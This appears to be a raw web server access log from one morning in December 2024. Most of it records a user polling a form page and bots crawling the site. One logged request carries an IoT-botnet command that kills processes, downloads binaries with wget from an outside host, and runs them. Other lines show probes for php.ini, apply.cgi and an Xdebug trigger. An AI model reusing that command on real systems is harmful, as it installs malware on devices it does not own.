178.165.191.42 - - [20/Dec/2024:08:51:18 +0100] "GET /gui/javascript/form_form.js?1734681078 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=681017" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:52:18 +0100] "GET /entry.php?id=10271&&ser=681078 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=681017" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:52:18 +0100] "GET /gui/javascript/form_form.js?1734681138 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=681078" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:53:18 +0100] "GET /entry.php?id=10271&&ser=681138 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=681078" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [20/Dec/2024:08:53:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202111021403_RenOrder.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:08:53:18 +0100] "GET /gui/javascript/form_form.js?1734681198 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=681138" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:54:18 +0100] "GET /entry.php?id=10271&&ser=681198 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=681138" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:54:19 +0100] "GET /gui/javascript/form_form.js?1734681259 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=681198" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:55:19 +0100] "GET /entry.php?id=10271&&ser=681259 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=681198" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:08:55:19 +0100] "GET /gui/javascript/form_form.js?1734681319 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=681259" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [20/Dec/2024:08:57:18 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202103271203_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Dec/2024:09:01:19 +0100] "GET /ed-test.2web.at/stats/lang/awstats-en.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
77.90.22.141 - - [20/Dec/2024:09:01:50 +0100] "GET / HTTP/1.1" 200 423 "-" "-"
156.59.198.135 - - [20/Dec/2024:09:05:19 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202009251103_RenOrder.xml HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
141.98.11.175 - - [20/Dec/2024:09:07:47 +0100] "GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+njvwa4+fnkea7;wget+http:/\\/ugh.eye-network.ru/fnkea7;chmod+777+fnkea7;./fnkea7+jaws;rm+-rf+fnkea7;wget+http:/\\/ugh.eye-network.ru/wheiuwa4;chmod+777+wheiuwa4;./wheiuwa4+jaws;rm+-rf+wheiuwa4 HTTP/1.1" 404 280 "-" "KrebsOnSecurity"
156.59.198.136 - - [20/Dec/2024:09:09:19 +0100] "GET /ed-test.2web.at/stats/lang/awstats-br.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.215.238.91 - - [20/Dec/2024:09:11:07 +0100] "POST /apply.cgi HTTP/1.1" 404 284 "http://212.69.160.11:80/apply.cgi" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36"
156.59.198.136 - - [20/Dec/2024:09:13:20 +0100] "GET /ed-test.2web.at/stats/lang/awstats-se.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [20/Dec/2024:09:17:20 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/202006221003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [20/Dec/2024:09:17:57 +0100] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
167.94.138.55 - - [20/Dec/2024:09:28:18 +0100] "\x16\x03\x01" 400 383 "-" "-"
167.94.138.55 - - [20/Dec/2024:09:28:25 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.55 - - [20/Dec/2024:09:28:27 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.55 - - [20/Dec/2024:09:28:28 +0100] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.55 - - [20/Dec/2024:09:28:30 +0100] "PRI * HTTP/2.0" 400 383 "-" "-"
156.59.198.136 - - [20/Dec/2024:09:46:12 +0100] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909161403_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
209.38.100.173 - - [20/Dec/2024:09:55:59 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible)"
209.38.100.173 - - [20/Dec/2024:09:55:59 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://webmail.creativecube.at/" "Mozilla/5.0 (compatible)"
209.38.100.173 - - [20/Dec/2024:09:55:59 +0100] "GET /ads.txt HTTP/1.1" 404 289 "-" "Mozilla/5.0 (compatible)"
178.165.191.42 - - [20/Dec/2024:09:59:53 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /gui/javascript/form_form.js HTTP/1.1" 304 - "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1158 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /gui/javascript/form_form.js?1734685194 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:54 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2419 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:55 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:55 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:55 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:55 +0100] "GET /gui/javascript/form_form.js?1734685195 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:09:59:57 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1967 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:00 +0100] "GET /gui/javascript/form_form.js?1734685260 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:00 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2011 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:00 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:00 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:01 +0100] "GET /gui/javascript/form_form.js?1734685261 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:01 +0100] "GET /gui/javascript/form_form.js?1734685261 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:01 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:01:01 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:02:01 +0100] "GET /entry.php?id=10271&&ser=685260 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:02:01 +0100] "GET /gui/javascript/form_form.js?1734685321 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685260" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:03:01 +0100] "GET /entry.php?id=10271&&ser=685321 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685260" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:03:01 +0100] "GET /gui/javascript/form_form.js?1734685381 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685321" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:04:01 +0100] "GET /entry.php?id=10271&&ser=685381 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685321" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:04:01 +0100] "GET /gui/javascript/form_form.js?1734685441 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685381" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:05:02 +0100] "GET /entry.php?id=10271&&ser=685441 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685381" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:05:02 +0100] "GET /gui/javascript/form_form.js?1734685502 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685441" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
34.140.124.166 - - [20/Dec/2024:10:05:36 +0100] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.3"
178.165.191.42 - - [20/Dec/2024:10:06:02 +0100] "GET /entry.php?id=10271&&ser=685502 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685441" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:06:02 +0100] "GET /gui/javascript/form_form.js?1734685562 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685502" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:07:02 +0100] "GET /entry.php?id=10271&&ser=685562 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685502" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:07:02 +0100] "GET /gui/javascript/form_form.js?1734685622 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:08:02 +0100] "GET /entry.php?id=10271&&ser=685622 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685562" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:08:03 +0100] "GET /gui/javascript/form_form.js?1734685683 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685622" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
147.185.132.18 - - [20/Dec/2024:10:08:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
147.185.132.18 - - [20/Dec/2024:10:08:40 +0100] "\x16\x03\x01" 400 383 "-" "-"
178.165.191.42 - - [20/Dec/2024:10:09:03 +0100] "GET /entry.php?id=10271&&ser=685683 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685622" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:09:03 +0100] "GET /gui/javascript/form_form.js?1734685743 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685683" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:10:03 +0100] "GET /entry.php?id=10271&&ser=685743 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685683" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:10:03 +0100] "GET /gui/javascript/form_form.js?1734685803 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685743" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:11:03 +0100] "GET /entry.php?id=10271&&ser=685803 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685743" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:11:03 +0100] "GET /gui/javascript/form_form.js?1734685863 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685803" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:12:04 +0100] "GET /entry.php?id=10271&&ser=685863 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685803" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:12:04 +0100] "GET /gui/javascript/form_form.js?1734685924 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685863" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:13:04 +0100] "GET /entry.php?id=10271&&ser=685924 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685863" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:13:04 +0100] "GET /gui/javascript/form_form.js?1734685984 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685924" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:14:04 +0100] "GET /entry.php?id=10271&&ser=685984 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=685924" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:14:04 +0100] "GET /gui/javascript/form_form.js?1734686044 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=685984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:15:05 +0100] "GET /entry.php?id=10271&&ser=686044 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=685984" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:15:05 +0100] "GET /gui/javascript/form_form.js?1734686105 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:16:05 +0100] "GET /entry.php?id=10271&&ser=686105 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686044" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:16:05 +0100] "GET /gui/javascript/form_form.js?1734686165 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686105" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:17:05 +0100] "GET /entry.php?id=10271&&ser=686165 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686105" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:17:05 +0100] "GET /gui/javascript/form_form.js?1734686225 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686165" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.136 - - [20/Dec/2024:10:17:17 +0100] "GET /renault.activities.at/htdocs/binaries/10130624.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:10:18:05 +0100] "GET /entry.php?id=10271&&ser=686225 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686165" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:18:06 +0100] "GET /gui/javascript/form_form.js?1734686286 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686225" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:19:06 +0100] "GET /entry.php?id=10271&&ser=686286 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=686225" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:19:06 +0100] "GET /gui/javascript/form_form.js?1734686346 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686286" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:20:06 +0100] "GET /entry.php?id=10271&&ser=686346 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686286" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:20:06 +0100] "GET /gui/javascript/form_form.js?1734686406 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686346" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:21:06 +0100] "GET /entry.php?id=10271&&ser=686406 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=686346" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:21:07 +0100] "GET /gui/javascript/form_form.js?1734686466 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686406" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [20/Dec/2024:10:21:17 +0100] "GET /renault.activities.at/htdocs/binaries/10017492.pdf HTTP/1.0" 404 311 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:10:22:07 +0100] "GET /entry.php?id=10271&&ser=686466 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686406" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:22:07 +0100] "GET /gui/javascript/form_form.js?1734686527 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686466" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:23:07 +0100] "GET /entry.php?id=10271&&ser=686527 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686466" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:23:07 +0100] "GET /gui/javascript/form_form.js?1734686587 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686527" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:24:07 +0100] "GET /entry.php?id=10271&&ser=686587 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686527" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:24:07 +0100] "GET /gui/javascript/form_form.js?1734686647 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686587" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
193.41.206.24 - - [20/Dec/2024:10:24:19 +0100] "GET /config/php.ini HTTP/1.1" 404 359 "-" "-"
178.165.191.42 - - [20/Dec/2024:10:25:08 +0100] "GET /entry.php?id=10271&&ser=686647 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686587" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.165.191.42 - - [20/Dec/2024:10:25:08 +0100] "GET /gui/javascript/form_form.js?1734686708 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=686647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
156.59.198.135 - - [20/Dec/2024:10:25:17 +0100] "GET /ed-test.2web.at/stats/lang/awstats-ua.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.191.42 - - [20/Dec/2024:10:26:08 +0100] "GET /entry.php?id=10271&&ser=686708 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=686647" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
